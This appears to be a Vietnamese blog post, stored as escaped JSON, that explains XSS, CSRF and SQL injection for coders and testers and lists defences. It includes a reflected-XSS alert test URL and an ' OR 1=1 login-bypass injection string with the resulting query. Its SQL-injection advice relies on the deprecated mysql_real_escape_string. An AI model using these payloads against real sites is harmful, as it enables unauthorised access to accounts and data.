M\u1ed9t s\u1ed1 k\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng web m\u00e0 hacker hay s\u1eed d\u1ee5ng \u0111\u1ec3 l\u1ea5y c\u1eafp th\u00f4ng tin, ph\u00e1 h\u1ecfng d\u1eef li\u1ec7u tr\u00ean h\u1ec7 th\u1ed1ng \u0111\u00f3 l\u00e0:<\/p>\n\n\n\n
Cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng nh\u00fang m\u00e3 \u0111\u1ecdc Javacsript, VBScript, ActiveX, HTML, ho\u1eb7c Flash v\u00e0o m\u1ed9t trang n\u0103ng \u0111\u1ed9ng, d\u1ec5 b\u1ecb \u0111\u00e1nh l\u1eeba ng\u01b0\u1eddi s\u1eed d\u1ee5ng, th\u1ef1c hi\u1ec7n k\u1ecbch b\u1ea3n tr\u00ean m\u00e1y t\u00ednh c\u1ee7a m\u00ecnh \u0111\u1ec3 thu th\u1eadp d\u1eef li\u1ec7u. K\u1ef9 thu\u1eadt n\u00e0y kh\u00f4ng t\u1ea5n c\u00f4ng v\u00e0o CSDL h\u1ec7 th\u1ed1ng nh\u01b0 SQL injection m\u00e0 ch\u00fang t\u1ea5n c\u00f4ng tr\u1ef1c ti\u1ebfp t\u1eeb ph\u00eda ng\u01b0\u1eddi d\u00f9ng b\u1eb1ng c\u00e1ch x\u00e2m nh\u1eadp h\u1ec7 th\u1ed1ng b\u1eb1ng c\u00e1c \u0111o\u1ea1n m\u00e3 \u0111\u01a1n gi\u1ea3n \u0111\u1ec3 l\u1ea5y c\u1eafp cookies v\u00e0 session t\u1eeb \u0111\u00f3 ch\u00fang c\u00f3 th\u1ec3 thao t\u00fang ng\u01b0\u1eddi d\u00f9ng c\u01b0\u1edbp quy\u1ec1n truy c\u1eadp t\u00e0i kho\u1ea3n m\u00e0 kh\u00f4ng c\u1ea7n t\u1edbi m\u1eadt kh\u1ea9u.<\/p>\n\n\n\n
http:\/\/www.example.com\/search?query=alert('XSS was found !');<\/code><\/li><\/ul>\n\n\n\n- Stored XSS: L\u00e0 m\u1ed9t bi\u1ebfn th\u1ec3 t\u00e0n ph\u00e1 g\u00e2y h\u1eadu qu\u1ea3 r\u1ea5t n\u1eb7ng n\u1ec1. Lo\u1ea1i n\u00e0y x\u1ea3y ra khi d\u1eef li\u1ec7u do c\u00e1c hacker cung c\u1ea5p \u0111\u01b0\u1ee3c l\u01b0u tr\u1eef tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 th\u00f4ng qua m\u1ed9t s\u1ed1 ch\u1ee9c n\u0103ng tr\u00ean website v\u00e0 t\u1eeb \u0111\u00f3 v\u1ec1 sau th\u00ec c\u00e1c d\u1eef li\u1ec7u n\u00e0y hi\u1ec3n nhi\u00ean \u0111\u01b0\u1ee3c hi\u1ec3n th\u1ecb m\u1ed9t c\u00e1ch b\u00ecnh th\u01b0\u1eddng tr\u00ean c\u00e1c tr\u00ecnh duy\u1ec7t c\u1ee7a ng\u01b0\u1eddi d\u00f9ng m\u00e0 kh\u00f4ng c\u1ea7n t\u1edbi HTML ri\u00eang n\u1eefa. V\u00e0 khi ng\u01b0\u1eddi d\u00f9ng click v\u00e0o nh\u1eefng ph\u1ea7n b\u1ecb g\u1eafn m\u00e3 \u0111\u1ed9c th\u00ec \u0111\u00e3 b\u1ecb d\u00ednh XSS. \u0110o\u1ea1n m\u00e3 ch\u00e8n th\u00eam v\u00e0o \u0111\u01b0\u1ee3c l\u01b0u tr\u1eef v\u00e0o CSDL tr\u00ean server d\u01b0\u1edbi d\u1ea1ng c\u00e1c comment trong blog, mesage, forum hay visitor logV\u00ed d\u1ee5: Khi \u0111\u0103ng k\u00fd th\u00e0nh vi\u00ean, ph\u1ea7n gi\u1edbi thi\u00eau v\u1ec1 b\u1ea3n th\u00e2n, n\u1ebfu hacker nh\u1eadp v\u00e0o m\u00e3 XSS v\u00e0 website kh\u00f4ng ki\u1ec3m tra k\u1ef9 d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o, th\u00ec m\u1ed7i khi truy c\u1eadp trang th\u00e0nh vi\u00ean c\u1ee7a hacker \u0111\u00f3, b\u1ea1n s\u1ebd b\u1ecb khai th\u00e1c.<\/li>
- M\u00f4 h\u00ecnh XSS<\/li>
- <\/li><\/ul>\n\n\n\n<\/figure>\n\n\n\n
T\u1eeb nh\u1eefng \u0111i\u1ec1u n\u00e0y c\u00f3 th\u1ec3 th\u1ea5y Stored XSS nguy hi\u1ec3m h\u01a1n Reflected XSS r\u1ea5t nhi\u1ec1u, \u0111\u1ed1i t\u01b0\u1ee3ng b\u1ecb \u1ea3nh h\u01b0\u1edfng c\u00f3 th\u1ebf l\u00e0 t\u1ea5t c\u1ea3 nh\u01b0ng ng\u01b0\u1eddi s\u1eed d\u1ee5ng \u1ee9ng d\u1ee5ng web \u0111\u00f3. V\u00e0 n\u1ebfu n\u1ea1n nh\u00e2n c\u00f3 vai tr\u00f2 qu\u1ea3n tr\u1ecb th\u00ec c\u00f2n c\u00f3 nguy c\u01a1 b\u1ecb chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n web.<\/p>\n\n\n\n
1.2. CSRF<\/h3>\n\n\n\n
T\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng k\u1ef9 thu\u1eadt n\u00e0y d\u00e0nh cho ng\u01b0\u1eddi am hi\u1ec3u v\u1ec1 h\u1ec7 th\u1ed1ng, c\u00f3 th\u1ec3 \u0111\u00e3 t\u1eebng ph\u00e1t tri\u1ec3n h\u1ec7 th\u1ed1ng \u0111\u00f3, ho\u1eb7c m\u1ed9t m\u00e3 ngu\u1ed3n m\u1edf, ho\u1eb7c m\u1ed9t m\u00e3 ngu\u1ed3n n\u00e0o \u0111\u00f3 \u0111\u00e3 \u0111\u01b0\u1ee3c c\u00f4ng khai code. Hacker th\u1ef1c hi\u1ec7n g\u1eedi tin nh\u1eafn d\u1ebfn Admin, khi admin \u0111\u1ecdc tin nh\u1eafn n\u00e0y tr\u00ecnh duy\u1ec7t s\u1ebd request \u0111\u1ebfn link \u0111\u00f3 v\u00e0 l\u1ea5y cookie c\u1ee7a tr\u00ecnh duy\u1ec7t v\u00e0 ti\u1ebfn h\u00e0nh active. Tr\u01b0\u1eddng h\u1ee3p kh\u00f4ng g\u1eedi \u0111\u01b0\u1ee3c mail, gi\u1ea3 s\u1eed ta bi\u1ebft r\u1eb1ng admin \u0111ang login hacker c\u00f3 th\u1ec3 send 1 trang web m\u00e0 hacher l\u1eadp ra, trong \u0111\u00f3 c\u00f3 \u0111o\u1ea1n code \u0111\u1ed9c h\u1ea1i r\u1ed3i send qua yahoo hay g\u00ec g\u00ec \u0111\u00f3, khi \u0111\u00f3 admin vi\u1ebfng th\u0103m v\u00e0o v\u00e0 th\u1ef1c hi\u1ec7n c\u00e1c thao t\u00e1c tr\u00ean. Nh\u01b0 v\u1eady hacker th\u1ef1c hi\u1ec7n m\u1ed9t truy v\u1ea5n tr\u00e1i ph\u00e9p d\u1ef1a v\u00e0o ch\u00ednh ng\u01b0\u1eddi d\u00f9ng<\/p>\n\n\n\n
1.3. SQl Injection<\/h3>\n\n\n\n<\/figure>\n\n\n\nCh\u1eafc h\u1eb3n c\u00e1c b\u1ea1n \u0111\u00e3 bi\u1ebft m\u00f4 h\u00ecnh ho\u1ea1t \u0111\u1ed9ng c\u1ee7a website r\u1ed3i nh\u1ec9? Khi m\u1ed9t request \u0111\u01b0\u1ee3c g\u1eedi t\u1eeb client th\u00ec ng\u00f4n ng\u1eef SERVER nh\u01b0 PHP s\u1ebd l\u1ea5y c\u00e1c th\u00f4ng tin t\u1eeb request \u0111\u00f3. Nh\u01b0ng b\u1ea3n th\u00e2n n\u00f3 kh\u00f4ng h\u1ec1 ph\u00e1t hi\u1ec7n ra nh\u1eefng th\u00f4ng tin \u0111\u00f3 c\u00f3 ch\u1ee9a nh\u1eefng c\u00e2u SQL \u0111\u1ed9c, v\u00ec th\u1ebf c\u00f4ng vi\u1ec7c n\u00e0y ta ph\u1ea3i \u0111\u1ed5 tr\u00e1ch nhi\u1ec7m t\u1edbi kinh nghi\u1ec7m c\u1ee7a l\u1eadp tr\u00ecnh vi\u00ean.
\u2013 Gi\u1ea3 s\u1eed t\u00f4i c\u00f3 m\u1ed9t trang \u0111\u0103ng nh\u1eadp v\u1edbi hai th\u00f4ng tin l\u00e0 t\u00ean \u0111\u0103ng nh\u1eadp v\u00e0 m\u1eadt kh\u1ea9u. V\u00e0 \u0111o\u1ea1n code x\u1eed l\u00fd t\u1ea5n c\u00f4ng sql injection c\u1ee7a t\u00f4i c\u00f3 d\u1ea1ng nh\u01b0 sau:
<\/p>\n\n\n\n123456<\/td> N\u1ebfu nh\u1eadp \u201d \u2018 OR 1=1\u2033 v\u00e0o \u00f4 text user v\u00e0 pass th\u00ec c\u00e2u l\u1ec7nh SQL s\u1ebd c\u00f3 d\u1ea1ng:`SELECT * FROM T_USERS WHERE username=\u201d OR 1=1 and password=\u201d OR 1=1;`Ch\u1ea1y c\u00e2u truy v\u1ea5n n\u00e0y l\u00ean th\u00ec k\u1ebft qu\u1ea3 n\u00f3 tr\u1ea3 v\u1ec1 l\u00e0 danh s\u00e1ch user n\u00ean n\u1ebfu code c\u00f9i c\u00f9i th\u00ec login \u0111\u01b0\u1ee3c lu\u00f4n. <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nTr\u00ean \u0111\u00e2y l\u00e0 m\u1ed9t v\u00ed d\u1ee5 \u0111i\u1ec3n h\u00ecnh th\u00f4i, ch\u1ee9 th\u1ef1c t\u1ebf th\u00ec hacker c\u00f2n r\u1ea5t nhi\u1ec1u m\u01b0u m\u1eb9o kh\u00e1c. Tuy nhi\u00ean chung quy l\u1ea1i v\u1edbi k\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng SQL Injection ta v\u1eabn c\u00f3 th\u1ec3 kh\u00f4ng ch\u1ebf \u0111\u01b0\u1ee3c n\u00f3.<\/p>\n\n\n\n
2. C\u00e1ch ph\u00f2ng ch\u1ed1ng:<\/strong><\/h3>\n\n\n\n2.1. XSS<\/h4>\n\n\n\n
C\u00e1ch ph\u00f2ng ch\u1ed1ng t\u1ed1t nh\u1ea5t XSS l\u00e0 theo nguy\u00ean t\u1eafc filter input v\u00e0 escape output. \u0110\u1ec3 l\u00e0m vi\u1ec7c n\u00e0y th\u00ec hi\u1ec7n t\u1ea1i c\u00f3 kh\u00e1 nhi\u1ec1u b\u1ed9 l\u1ecdc \u0111\u1ec3 ch\u00fang ta l\u1ef1a ch\u1ecdn. D\u1ef1a v\u00e0o c\u00e1ch kh\u1eafc ph\u1ee5c \u0111\u00f3 b\u1ea1n c\u00f3 th\u1ec3 d\u00f9ng m\u1ed9t th\u01b0 vi\u1ec7n vi\u1ebft b\u1eb1ng PHP cho ph\u00e9p filter HTML \u0111\u1ec3 ng\u0103n ch\u1eb7n k\u1ebb x\u1ea5u post m\u00e3 \u0111\u1ed9c XSS th\u00f4ng qua website c\u1ee7a b\u1ea1n. Th\u01b0 vi\u1ec7n c\u00f3 s\u1eb5n \u0111\u00f3 l\u00e0 HTML Purifier. \u0110\u00e2y l\u00e0 b\u1ed9 th\u01b0 vi\u1ec7n r\u1ea5t m\u1ea1nh d\u00f9ng tri\u1ec3n kahi trong code c\u1ee7a m\u00ecnh \u0111\u1ec3 ch\u1ed1ng XSS. \u0110\u01b0\u1ee3c x\u00e2y d\u1ef1ng theo m\u00f4 h\u00ecnh \u00d4P n\u00ean s\u1eed d\u1ee5ng r\u1ea5t d\u1ec5, sau thao t\u00e1c include file th\u01b0 vi\u1ec7n, ch\u1ec9 c\u1ea7n t\u1ea1o instance c\u1ee7a \u0111\u1ed1i t\u01b0\u1ee3ng HTML Purifier v\u00e0 g\u1ecdi ph\u01b0\u01a1ng th\u1ee9c purify() l\u00e0 c\u00f3 th\u1ec3 filter \u0111\u01b0\u1ee3c d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o<\/p>\n\n\n\n
2.2. CSRF<\/h4>\n\n\n\n
Th\u00f4ng th\u01b0\u1eddng \u0111\u1ec3 tr\u00e1nh t\u1ea5n c\u00f4ng ta s\u1ebd chia l\u00e0m hai \u0111\u1ed1i t\u01b0\u1ee3ng, m\u1ed9t l\u00e0 \u0111\u1ed1i t\u01b0\u1ee3ng coder v\u00e0 hai l\u00e0 \u0111\u1ed1i t\u01b0\u1ee3ng ng\u01b0\u1eddi d\u00f9ng cu\u1ed1i (user).
\u2013 V\u1edbi \u0111\u1ed1i t\u01b0\u1ee3ng ng\u01b0\u1eddi d\u00f9ng cu\u1ed1i th\u00ec:
\u2013 H\u1ea1n ch\u1ebf s\u1eed d\u1ee5ng login v\u00e0o h\u1ec7 th\u1ed1ng khi n\u00f3i chuy\u1ec7n ti\u1ebfp x\u00fac v\u1edbi nh\u1eefng ng\u01b0\u1eddi l\u1ea1 qua c\u00e1c k\u00eanh kh\u00e1c nhau, nh\u1eefng email kh\u00f4ng r\u00f5 ngu\u1ed3n g\u1ed1c. Khi kh\u00f4ng d\u00f9ng h\u1ec7 th\u1ed1ng th\u00ec l\u1eadp t\u1ee9c logout.
\u2013 N\u00ean login v\u00e0o m\u1ed9t m\u00e1y ri\u00eang v\u00e0 kh\u00f4ng cho ng\u01b0\u1eddi th\u1ee9 2 ti\u1ebfp x\u00fac v\u1edbi m\u00e1y \u0111\u00f3.
\u2013 Thay \u0111\u1ed5i m\u1eadt kh\u1ea9u li\u00ean t\u1ee5c, v\u00e0 ch\u1ecdn nh\u1eefng m\u1eadt kh\u1ea9u kh\u00f3 \u0111o\u00e1n, c\u00f3 k\u1ef9 t\u1ef1 \u0111\u1eb7c bi\u1ec7t. V\u00ec hi\u1ec7n nay c\u00f3 r\u1ea5t nhi\u1ec1u ph\u1ea7n m\u1ec1m d\u00f2 pass.
\u2013 V\u1edbi \u0111\u1ed1i t\u01b0\u1ee3ng coder:
\u2013 Th\u1ef1c hi\u1ec7n t\u1ea1o nh\u1eefng token auto v\u00e0 random v\u1edbi t\u1eebng m\u00e1y, t\u1eebng tr\u00ecnh duy\u1ec7t v\u00e0 thi\u1ebft l\u1eadp th\u1eddi gian s\u1ed1ng cho token \u0111\u00f3.
\u2013 Kh\u00f4ng s\u1eed d\u1ee5ng ph\u01b0\u01a1ng th\u1ee9c GET v\u1edbi nh\u1eefng request m\u00e0 c\u00f3 \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn CSDL.
\u2013 Khi l\u1ea5y d\u1eef li\u1ec7u t\u1eeb ng\u01b0\u1eddi d\u00f9ng th\u00ec ki\u1ec3m tra ch\u1eb7t ch\u1ebd.
\u2013 URL trong admin c\u00e0ng kh\u00f3 nh\u1edb c\u00e0ng b\u00ed hi\u1ec3m c\u00e0ng t\u1ed1t.<\/p>\n\n\n\n
2.3. SQL Injection<\/h4>\n\n\n\n- Nh\u1eadn d\u1eef li\u1ec7u ki\u1ec3u INT<\/li>
- Vi\u1ebft l\u1ea1i \u0111\u01b0\u1eddng d\u1eabn c\u00f3 th\u1ec3 ch\u1ed1ng SQL Injection<\/li>
- S\u1eed d\u1ee5ng h\u00e0m sprintf v\u00e0
mysql_real_escape_string<\/code> \u0111\u1ec3 c\u00e1c \u0111\u1ecbnh ki\u1ec3u d\u1eef li\u1ec7u cho c\u00e2u truy v\u1ea5n.<\/li><\/ul>\n\n\n\nTr\u00ean \u0111\u00e2y l\u00e0 3 c\u00e1ch m\u00e0 hacker th\u01b0\u1eddng d\u00f9ng \u0111\u1ec3 c\u00f3 th\u1ec3 x\u00e2m nh\u1eadp v\u00e0o h\u1ec7 th\u1ed1ng. V\u00ec v\u1eady Coder th\u00ec n\u00ean bi\u1ebft \u0111\u1ec3 ph\u00f2ng tr\u00e1nh v\u00e0 Tester n\u00ean bi\u1ebft \u0111\u1ec3 t\u00ecm ra c\u00e1c l\u1ed7i n\u00e0y \u0111\u1ec3 hacker kh\u00f3 c\u00f3 th\u1ec3 x\u00e2m nh\u1eadp \u0111\u01b0\u1ee3c v\u00e0o h\u1ec7 th\u1ed1ng.<\/p>\n","protected":false},"excerpt":{"rendered":"
M\u1ed9t s\u1ed1 k\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng web m\u00e0 hacker hay s\u1eed d\u1ee5ng \u0111\u1ec3 l\u1ea5y c\u1eafp th\u00f4ng tin, ph\u00e1 h\u1ecfng d\u1eef li\u1ec7u tr\u00ean h\u1ec7 th\u1ed1ng \u0111\u00f3 l\u00e0: XSS (Cross-Site Scripting):L\u00e0 m\u1ed9t trong nh\u1eefng k\u0129 thu\u1eadt t\u1ea5n c\u00f4ng ph\u1ed5 bi\u1ebfn nh\u1ea5t hi\u1ec7n nay, \u0111\u1ed3ng th\u1eddi n\u00f3 c\u0169ng l\u00e0 m\u1ed9t trong nh\u1eefng v\u1ea5n \u0111\u1ec1 b\u1ea3o m\u1eadt quan tr\u1ecdng […]<\/p>\n","protected":false},"author":12,"featured_media":47762,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"tdm_status":"","tdm_grid_status":""},"categories":[1651],"tags":[],"yoast_head":"\n
M\u1ed9t s\u1ed1 k\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng web<\/title>\n\n\n\n\n\n\n\n\n\n\n\n\t\n\t\n\t\n\n\n\n\t\n\t\n\t\n